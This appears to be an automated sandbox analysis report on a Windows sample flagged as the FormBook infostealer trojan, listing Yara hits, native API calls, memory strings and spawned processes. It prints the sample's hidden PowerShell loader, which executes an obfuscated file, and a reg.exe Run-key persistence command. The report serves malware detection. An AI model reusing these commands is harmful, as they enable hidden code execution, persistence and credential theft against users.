Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cmd.exe, 0000000C.00000003.2329977830.0000000007C29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D3

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Untapestried.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03144340 NtSetContextThread,LdrInitializeThunk, 12_2_03144340
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03144650 NtSuspendThread,LdrInitializeThunk, 12_2_03144650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142B60 NtClose,LdrInitializeThunk, 12_2_03142B60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142AD0 NtReadFile,LdrInitializeThunk, 12_2_03142AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142AF0 NtWriteFile,LdrInitializeThunk, 12_2_03142AF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142F30 NtCreateSection,LdrInitializeThunk, 12_2_03142F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142FB0 NtResumeThread,LdrInitializeThunk, 12_2_03142FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142FE0 NtCreateFile,LdrInitializeThunk, 12_2_03142FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142EE0 NtQueueApcThread,LdrInitializeThunk, 12_2_03142EE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142D10 NtMapViewOfSection,LdrInitializeThunk, 12_2_03142D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_03142D30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142DD0 NtDelayExecution,LdrInitializeThunk, 12_2_03142DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03142DF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_03142C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142C60 NtCreateKey,LdrInitializeThunk, 12_2_03142C60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk, 12_2_03142CA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031435C0 NtCreateMutant,LdrInitializeThunk, 12_2_031435C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031439B0 NtGetContextThread,LdrInitializeThunk, 12_2_031439B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142B80 NtQueryInformationFile, 12_2_03142B80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142BA0 NtEnumerateValueKey, 12_2_03142BA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142BF0 NtAllocateVirtualMemory, 12_2_03142BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142BE0 NtQueryValueKey, 12_2_03142BE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142AB0 NtWaitForSingleObject, 12_2_03142AB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142F60 NtCreateProcessEx, 12_2_03142F60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142F90 NtProtectVirtualMemory, 12_2_03142F90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142FA0 NtQuerySection, 12_2_03142FA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142E30 NtWriteVirtualMemory, 12_2_03142E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142E80 NtReadVirtualMemory, 12_2_03142E80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142EA0 NtAdjustPrivilegesToken, 12_2_03142EA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142D00 NtSetInformationFile, 12_2_03142D00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142DB0 NtEnumerateKey, 12_2_03142DB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142C00 NtQueryInformationProcess, 12_2_03142C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142CC0 NtQueryVirtualMemory, 12_2_03142CC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142CF0 NtOpenProcess, 12_2_03142CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03143010 NtOpenDirectoryObject, 12_2_03143010
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03143090 NtSetValueKey, 12_2_03143090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03143D10 NtOpenProcessToken, 12_2_03143D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03143D70 NtOpenThread, 12_2_03143D70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02857730 NtCreateFile, 12_2_02857730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02857A10 NtClose, 12_2_02857A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02857890 NtReadFile, 12_2_02857890
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02857970 NtDeleteFile, 12_2_02857970
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_0040335A
Detected potential crypto function
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00404B10 0_2_00404B10
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_0040653F 0_2_0040653F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BDF108 1_2_04BDF108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BDF9D8 1_2_04BDF9D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BDEDC0 1_2_04BDEDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CA352 12_2_031CA352
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E3F0 12_2_0311E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D03E6 12_2_031D03E6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0274 12_2_031B0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031902C0 12_2_031902C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AA118 12_2_031AA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100100 12_2_03100100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03198158 12_2_03198158
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D01AA 12_2_031D01AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C41A2 12_2_031C41A2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C81CC 12_2_031C81CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03134750 12_2_03134750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310C7C0 12_2_0310C7C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312C6E0 12_2_0312C6E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D0591 12_2_031D0591
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B4420 12_2_031B4420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C2446 12_2_031C2446
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BE4F6 12_2_031BE4F6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CAB40 12_2_031CAB40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C6BD7 12_2_031C6BD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310EA80 12_2_0310EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03126962 12_2_03126962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031129A0 12_2_031129A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031DA9A6 12_2_031DA9A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311A840 12_2_0311A840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03112840 12_2_03112840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F68B8 12_2_030F68B8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E8F0 12_2_0313E8F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03130F30 12_2_03130F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B2F30 12_2_031B2F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03152F28 12_2_03152F28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03184F40 12_2_03184F40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318EFA0 12_2_0318EFA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03102FC8 12_2_03102FC8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CEE26 12_2_031CEE26
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110E59 12_2_03110E59
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03122E90 12_2_03122E90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CCE93 12_2_031CCE93
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CEEDB 12_2_031CEEDB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031ACD1F 12_2_031ACD1F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311AD00 12_2_0311AD00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03128DBF 12_2_03128DBF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310ADE0 12_2_0310ADE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110C00 12_2_03110C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B0CB5 12_2_031B0CB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100CF2 12_2_03100CF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C132D 12_2_031C132D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FD34C 12_2_030FD34C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0315739A 12_2_0315739A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031152A0 12_2_031152A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312B2C0 12_2_0312B2C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312D2F0 12_2_0312D2F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B12ED 12_2_031B12ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031DB16B 12_2_031DB16B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314516C 12_2_0314516C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FF172 12_2_030FF172
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311B1B0 12_2_0311B1B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031170C0 12_2_031170C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BF0CC 12_2_031BF0CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C70E9 12_2_031C70E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CF0E0 12_2_031CF0E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CF7B0 12_2_031CF7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03155630 12_2_03155630
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C16CC 12_2_031C16CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C7571 12_2_031C7571
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AD5B0 12_2_031AD5B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D95C3 12_2_031D95C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CF43F 12_2_031CF43F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03101460 12_2_03101460
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CFB76 12_2_031CFB76
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312FB80 12_2_0312FB80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03185BF0 12_2_03185BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0314DBF9 12_2_0314DBF9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CFA49 12_2_031CFA49
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C7A46 12_2_031C7A46
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03183A6C 12_2_03183A6C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03155AA0 12_2_03155AA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031ADAAC 12_2_031ADAAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B1AA3 12_2_031B1AA3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BDAC6 12_2_031BDAC6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A5910 12_2_031A5910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03119950 12_2_03119950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312B950 12_2_0312B950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317D800 12_2_0317D800
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031138E0 12_2_031138E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CFF09 12_2_031CFF09
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03111F92 12_2_03111F92
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CFFB1 12_2_031CFFB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D3FD5 12_2_030D3FD5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D3FD2 12_2_030D3FD2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03119EB0 12_2_03119EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C1D5A 12_2_031C1D5A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03113D40 12_2_03113D40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C7D73 12_2_031C7D73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312FDC0 12_2_0312FDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03189C32 12_2_03189C32
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031CFCF2 12_2_031CFCF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02841370 12_2_02841370
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0283A7B0 12_2_0283A7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0283C730 12_2_0283C730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0283C510 12_2_0283C510
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02842EAC 12_2_02842EAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02842EB0 12_2_02842EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02859E80 12_2_02859E80
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0318F290 appears 103 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03157E54 appears 107 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 030FB970 appears 262 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03145130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0317EA12 appears 86 times
Uses 32bit PE files
Source: 160420241245287.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
Yara signature match
Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/54@5/6
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045CA
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Users\user\Desktop\160420241245287.exe File created: C:\Users\user\AppData\Roaming\opbevaringssteder Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\160420241245287.exe File created: C:\Users\user\AppData\Local\Temp\nsj6995.tmp Jump to behavior
Source: 160420241245287.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\160420241245287.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cmd.exe, 0000000C.00000003.2333166165.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A14000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2330740762.0000000002A35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 160420241245287.exe Virustotal: Detection: 18%
Source: C:\Users\user\Desktop\160420241245287.exe File read: C:\Users\user\Desktop\160420241245287.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\160420241245287.exe "C:\Users\user\Desktop\160420241245287.exe"
Source: C:\Users\user\Desktop\160420241245287.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
